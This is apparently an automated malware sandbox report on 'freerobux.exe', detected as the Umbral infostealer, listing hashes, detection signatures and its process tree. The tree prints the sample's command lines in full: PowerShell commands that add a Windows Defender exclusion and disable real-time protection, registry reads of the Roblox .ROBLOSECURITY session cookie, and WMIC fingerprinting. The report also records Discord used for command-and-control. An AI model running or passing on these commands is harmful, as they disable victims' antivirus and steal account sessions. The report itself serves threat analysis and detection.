Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
24/09/2024, 19:48
Behavioral task
behavioral1
Sample
freerobux.exe
Resource
win7-20240708-en
General
-
Target
freerobux.exe
-
Size
229KB
-
MD5
b994081ca7787fdf253902e28c1a5c47
-
SHA1
91c30f314dda937fac7b5133c4f378e6c2cd47ff
-
SHA256
429170a034f165b7b9223205b04482ba8b1cc5582f9344bf70123c7e7e8e4c3e
-
SHA512
17b80c2325c0e900fa1a2c026d8eba0c3985ce27bb71c4f226a6d52a3f0122e4ad969fb163d75ec435169ea12c8b9538777986ab2dc498e5529d94ce20d019d4
-
SSDEEP
6144:FloZMArIkd8g+EtXHkv/iD4vWEs9rI8jP67NokR37b8e1mAi:HoZHL+EP8vWEs9rI8jP67NokRv+
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/3044-1-0x0000000000F90000-0x0000000000FD0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2656 powershell.exe 2264 powershell.exe 3000 powershell.exe 2348 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts freerobux.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1256 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2656 powershell.exe 2264 powershell.exe 3000 powershell.exe 1488 powershell.exe 2348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3044 freerobux.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeIncreaseQuotaPrivilege 2244 wmic.exe Token: SeSecurityPrivilege 2244 wmic.exe Token: SeTakeOwnershipPrivilege 2244 wmic.exe Token: SeLoadDriverPrivilege 2244 wmic.exe Token: SeSystemProfilePrivilege 2244 wmic.exe Token: SeSystemtimePrivilege 2244 wmic.exe Token: SeProfSingleProcessPrivilege 2244 wmic.exe Token: SeIncBasePriorityPrivilege 2244 wmic.exe Token: SeCreatePagefilePrivilege 2244 wmic.exe Token: SeBackupPrivilege 2244 wmic.exe Token: SeRestorePrivilege 2244 wmic.exe Token: SeShutdownPrivilege 2244 wmic.exe Token: SeDebugPrivilege 2244 wmic.exe Token: SeSystemEnvironmentPrivilege 2244 wmic.exe Token: SeRemoteShutdownPrivilege 2244 wmic.exe Token: SeUndockPrivilege 2244 wmic.exe Token: SeManageVolumePrivilege 2244 wmic.exe Token: 33 2244 wmic.exe Token: 34 2244 wmic.exe Token: 35 2244 wmic.exe Token: SeIncreaseQuotaPrivilege 2244 wmic.exe Token: SeSecurityPrivilege 2244 wmic.exe Token: SeTakeOwnershipPrivilege 2244 wmic.exe Token: SeLoadDriverPrivilege 2244 wmic.exe Token: SeSystemProfilePrivilege 2244 wmic.exe Token: SeSystemtimePrivilege 2244 wmic.exe Token: SeProfSingleProcessPrivilege 2244 wmic.exe Token: SeIncBasePriorityPrivilege 2244 wmic.exe Token: SeCreatePagefilePrivilege 2244 wmic.exe Token: SeBackupPrivilege 2244 wmic.exe Token: SeRestorePrivilege 2244 wmic.exe Token: SeShutdownPrivilege 2244 wmic.exe Token: SeDebugPrivilege 2244 wmic.exe Token: SeSystemEnvironmentPrivilege 2244 wmic.exe Token: SeRemoteShutdownPrivilege 2244 wmic.exe Token: SeUndockPrivilege 2244 wmic.exe Token: SeManageVolumePrivilege 2244 wmic.exe Token: 33 2244 wmic.exe Token: 34 2244 wmic.exe Token: 35 2244 wmic.exe Token: SeIncreaseQuotaPrivilege 2028 wmic.exe Token: SeSecurityPrivilege 2028 wmic.exe Token: SeTakeOwnershipPrivilege 2028 wmic.exe Token: SeLoadDriverPrivilege 2028 wmic.exe Token: SeSystemProfilePrivilege 2028 wmic.exe Token: SeSystemtimePrivilege 2028 wmic.exe Token: SeProfSingleProcessPrivilege 2028 wmic.exe Token: SeIncBasePriorityPrivilege 2028 wmic.exe Token: SeCreatePagefilePrivilege 2028 wmic.exe Token: SeBackupPrivilege 2028 wmic.exe Token: SeRestorePrivilege 2028 wmic.exe Token: SeShutdownPrivilege 2028 wmic.exe Token: SeDebugPrivilege 2028 wmic.exe Token: SeSystemEnvironmentPrivilege 2028 wmic.exe Token: SeRemoteShutdownPrivilege 2028 wmic.exe Token: SeUndockPrivilege 2028 wmic.exe Token: SeManageVolumePrivilege 2028 wmic.exe Token: 33 2028 wmic.exe Token: 34 2028 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2656 3044 freerobux.exe 30 PID 3044 wrote to memory of 2656 3044 freerobux.exe 30 PID 3044 wrote to memory of 2656 3044 freerobux.exe 30 PID 3044 wrote to memory of 2264 3044 freerobux.exe 32 PID 3044 wrote to memory of 2264 3044 freerobux.exe 32 PID 3044 wrote to memory of 2264 3044 freerobux.exe 32 PID 3044 wrote to memory of 3000 3044 freerobux.exe 34 PID 3044 wrote to memory of 3000 3044 freerobux.exe 34 PID 3044 wrote to memory of 3000 3044 freerobux.exe 34 PID 3044 wrote to memory of 1488 3044 freerobux.exe 36 PID 3044 wrote to memory of 1488 3044 freerobux.exe 36 PID 3044 wrote to memory of 1488 3044 freerobux.exe 36 PID 3044 wrote to memory of 2244 3044 freerobux.exe 38 PID 3044 wrote to memory of 2244 3044 freerobux.exe 38 PID 3044 wrote to memory of 2244 3044 freerobux.exe 38 PID 3044 wrote to memory of 2028 3044 freerobux.exe 41 PID 3044 wrote to memory of 2028 3044 freerobux.exe 41 PID 3044 wrote to memory of 2028 3044 freerobux.exe 41 PID 3044 wrote to memory of 536 3044 freerobux.exe 43 PID 3044 wrote to memory of 536 3044 freerobux.exe 43 PID 3044 wrote to memory of 536 3044 freerobux.exe 43 PID 3044 wrote to memory of 2348 3044 freerobux.exe 45 PID 3044 wrote to memory of 2348 3044 freerobux.exe 45 PID 3044 wrote to memory of 2348 3044 freerobux.exe 45 PID 3044 wrote to memory of 1256 3044 freerobux.exe 47 PID 3044 wrote to memory of 1256 3044 freerobux.exe 47 PID 3044 wrote to memory of 1256 3044 freerobux.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\freerobux.exe"C:\Users\Admin\AppData\Local\Temp\freerobux.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\freerobux.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2348
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1256
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51e7ed5fcbca860fdce9d6a892d52c0a3
SHA13bbbbba92f4a3bea2d43fe2deeea9a3f3290bbf7
SHA2563e2bcb98ddb9dd3c7f602a12083993e14a8740dd70c31f5e99e9c159304e4d19
SHA512666e251d10df588c4cf66ee1e2034513b766fa259114db44ea02dd13e7b00c299c87047099d618f3bf703bb606410dd6f99b227bff60b11b1b6f056a0ac0dde0